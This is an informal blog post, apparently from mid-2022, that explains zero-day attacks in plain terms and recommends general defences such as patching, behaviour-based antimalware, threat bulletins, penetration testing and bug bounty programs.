Well everybody, Happy 4th of July!!! Hopefully the second half of the year goes by
better than this last one!!! Looking back
at the last half, really, the Cyber Threat Landscape does not appear to
different than in 2021.
There are the usual Ransomware and Phishing attacks, but
nothing has caught my eye that I remember.
Sure, there was the fear of escalated attacks from Russia as it invaded the
Ukraine, but nothing disastrous has happened (at least not yet).
But there is one variant that all IT Security teams need to
be on the look out for, and these are technically known as the “Zero Day
Attacks”. What is it, you may be asking? A technical definition of it as follows:
“[It] is a cyber-attack targeting a software vulnerability
which is unknown to the software vendor or to antivirus vendors. The attacker
spots the software vulnerability before any parties interested in mitigating
it, quickly creates an exploit, and uses it for an attack. Such attacks are
highly likely to succeed because defenses are not in place. This makes zero-day
attacks a severe security threat.”
(SOURCE: https://www.imperva.com/learn/application-security/zero-day-exploit/).
Basically put, it is a weakness or gap in a software
application that even the maker of the software product does not even know
about. The only way it becomes known is
if a Cyberattacker examines the software package on their own, and tries to
find that particular backdoor. Once he or
she discovers it, they then try to penetrate as quickly as possible.
From here, they can stay in for as long as they want, because
really, nobody else has discovered this gap. Once the Cyberattacker has decided
where they will deliver the malicious payload, they drop it, and get away as
far as they can in order to cover their tracks (but even the shrewdest of
Cyberattackers always will leave some evidence behind).
So now you can tell why it is called a Zero Day attack – there
are no telltale signs or even warnings that something is about to happen. In a way, this is probably about the worst
form of Cyberattack, because everybody is caught off guard, and the end result
can be almost disastrous, even bringing the business to its knees.
But believe it or not, Zero Day Attacks are nothing new.
They have been around for even over twenty years, but the difference between
then and now is that given the digital world we live in, news about them
spreads like wildfire. Even the largest
of the tech giants such as Google and Microsoft keep track of these, given the amount
of access they have now to threat intelligence.
There was a huge rise in these kinds of threat vectors just
last year, and it is even expected that they will continue to grow. Some of these Zero Days are extremely sophisticated
like the Solar Winds hack, where the Cyberattacker looks for holes in an external
third party which can infiltrate thousands of end users.
Or they can be low level ones, such as attacking a piece of
software, such as Word, Excel, or even PowerPoint (these have been among the favorite
targets for Cyberattackers).
Given how covert these Zero Day Attacks can be, what can you
do to protect your business? Here are
some key steps:
*Try to use antimalware/antivirus spyware software that has
some sort of AI embedded into them. The
reason I say this these newer versions actually look for patterns of unusual
behavior, and alert you in that way. Previous
versions simply compared known attack signatures which existed in their
database. While this can be effective way
of doing this, keep in mind that the antivirus/antimalware vendor has to update
these databases. Usually it is not done on
a real time basis, it is done by batches, this leaving the window of
vulnerability open even longer/
*Keep up to date with all of your software patches and
upgrades. Yes, you keep hearing this all
of the time, but it still remains one of the best ways to fend off any threat variants.
It’s a pain I know, but it will be well worth it in the end.
*Keep up with the latest Cyber threat bulletins that are
made to the public. Some of the leading
sources for this include CISA, and the FBI.
Always carefully look over these bulletins, and double check that your
IT/Network Infrastructure are not vulnerable to them.
*Expand your IT Security team. Yea, I know, this is a broken record just
like keeping track of software patches and upgrades. But now is the time to hire and expand your base,
with real humans!!! Remember, technology
can only go so far, you also need the human element in there as well. Who cares if you hire somebody that is not
experienced enough. Train them in the best way you can. There is no substitute for on-the-job
training, and learning while the real thing is happening.
*The only way to detect any unknown vulnerabilities is to
actually a conduct a deep dive Penetration Test. But depending upon how exhaustive you want
them to be, these can only be done at one point in time, and they are
expensive. For example, the average Pen
Test costs on average $20k-$30k. Just imagine
if you had to do that 4x a year. That
would really eat up your bottom line.
But the good news is that there are new Pen Test tools that are coming
out on the marketplace, which allow you to do run them both automatically and
autonomously on a real time basis. The
bottom line here is that you pay a yearly license fee, and you can run as many
Pen Tests as you need to without any extra costs incurred.
My Thoughts On This:
Another god way to detect the unknown is to have a Bug
Bounty program. This is where you hire
hackers of all sorts, and the literally break into your system to find the
unknown vulnerabilities. In return, you
pay that individual or group a handsome prize of money. But, be careful of you participates in this,
as you do not want a Cyberattacker from nation state participating in this.
Finally, as mentioned earlier, be always on the lookout for
any anomalies. Don’t just look for known
attack signatures. Any unusual behavior
means that something is happening in real time, and that for sure merits your attention
in order for a Zero Day from happening.
No comments:
Post a Comment